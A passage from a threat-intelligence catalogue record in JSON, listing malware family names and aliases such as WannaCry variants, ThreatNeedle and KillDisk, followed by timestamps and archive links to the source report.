"RomeoMike", "RomeoNovember", "RomeoWhiskey", "Romeos", "RustBucket", "SHADYCAT", "SHARPKNOT", "SIGFLIP", "SIMPLESEA", "SLICKSHOES", "SORRYBRUTE", "SUDDENICON", "SUGARLOADER", "SheepRAT", "SierraAlfa", "SierraBravo", "SierraCharlie", "SierraJuliett-MikeOne", "SierraJuliett-MikeTwo", "SimpleTea", "SimplexTea", "SmallTiger", "Stunnel", "TAINTEDSCRIBE", "TAXHAUL", "TFlower", "TOUCHKEY", "TOUCHMOVE", "TOUCHSHIFT", "TOUCHSHOT", "TWOPENCE", "TYPEFRAME", "Tdrop", "Tdrop2", "ThreatNeedle", "Tiger RAT", "TigerRAT", "Trojan Manuscript", "Troy", "TroyRAT", "VEILEDSIGNAL", "VHD", "VHD Ransomware", "VIVACIOUSGIFT", "VSingle", "ValeforBeta", "Volgmer", "Vyveva", "W1_RAT", "Wana Decrypt0r", "WanaCry", "WanaCrypt", "WanaCrypt0r", "WannaCry", "WannaCrypt", "WannaCryptor", "WbBot", "Wcry", "Win32/KillDisk.NBB", "Win32/KillDisk.NBC", "Win32/KillDisk.NBD", "Win32/KillDisk.NBH", "Win32/KillDisk.NBI", "WinorDLL64", "Winsec", "WolfRAT", "Wormhole", "YamaBot", "Yort", "ZetaNile", "concealment_troy", "http_troy", "httpdr0pper", "httpdropper", "klovbot", "sRDI" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434732, "ts_updated_at": 1775792299, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/5974cd546fdb0aebbbbebbba06950740007ecc37.pdf", "text": "https://archive.orkl.eu/5974cd546fdb0aebbbbebbba06950740007ecc37.txt", "img": "https://archive.orkl.eu/5974cd546fdb0aebbbbebbba06950740007ecc37.jpg" } }